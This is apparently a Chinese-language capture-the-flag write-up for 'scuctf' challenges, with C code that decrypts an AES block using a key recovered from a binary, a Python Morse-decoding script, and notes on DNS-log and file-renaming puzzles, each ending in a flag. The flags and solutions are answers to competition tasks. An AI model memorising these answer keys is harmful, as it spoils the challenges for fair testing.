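print(flag)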

nodebugger

长度限制32,字符限制小写的十六进制

算法插件发现有AES加密和MD5哈希

MD5用于生成最后的比较数据,直接hook

AES密钥为unk_4568E0

(在线工具属实坑

#include <stdio.h>
#include <openssl/aes.h>


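/*
 * Decrypt one 16-byte AES-128 block with the embedded key and print the
 * result as 32 lowercase hex digits.
 *
 * Changes from the original: the buffers are `unsigned char` (the
 * initializers exceed the range of a signed char and the OpenSSL functions
 * take unsigned char pointers), and the return value of
 * AES_set_decrypt_key() is checked instead of ignored.
 * NOTE(review): the low-level AES_* interface is deprecated in OpenSSL 3.0;
 * expect deprecation warnings when building against it.
 */
int main()
{
    /* 128-bit key; per the write-up it was read from unk_4568E0. */
    const unsigned char key[16] = {0xC5,0x77,0xBB,0x0B,0xCB,0xAC,0x58,0x12,0x39,0xBB,0xD5,0x13,0x24,0x4D,0xAA,0x12};
    /* Single ciphertext block to decrypt. */
    const unsigned char in[16] = {0x67,0x76,0x42,0x90,0x5f,0x97,0x76,0x3b,0x33,0xb6,0x08,0x88,0x2c,0xdc,0xc5,0x4a};
    unsigned char out[16];
    AES_KEY aes;

    /* AES_set_decrypt_key() returns 0 on success. */
    if (AES_set_decrypt_key(key, 128, &aes) != 0) {
        fprintf(stderr, "AES_set_decrypt_key failed\n");
        return 1;
    }
    AES_decrypt(in, out, &aes);

    for (int i = 0; i < 16; i++) {
        printf("%02x", out[i]);
    }
    printf("\n");

    return 0;
}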

scuctf{d178350b4f101a795b7e04eaf5c2721b}

Misc

esay_encode

三种字符猜测是摩斯电码

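# Rewrite the first 13 lines of flag.txt into Morse-style symbols and print
# them. Changes from the original: the file is closed via `with`, and
# print() is written so it runs on Python 2 and 3.
with open('flag.txt') as f:
    for _ in range(13):
        s = f.readline()
        s = s.replace('401', '.')  # long
        s = s.replace('SCU', '_')  # short
        s = s.replace(' ', '/')    # spaces become separators
        s = s.replace('#', '')     # '#' characters are dropped
        # Drop the last character of the line (the newline, when present).
        print(s[:-1])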

scuctf{R3@D_B3TW33N_TH3_L1N3S}

奇怪的记录

DNS查询

scuctf{72f216f4-1798-11eb-aa2a-54e1ad16c80b}

excalibur

修改后缀为zip

路径:excalibur\assets\excalibur\lang\en_us.json

scuctf{y0u_134rn_f0r93_v3ry_w311}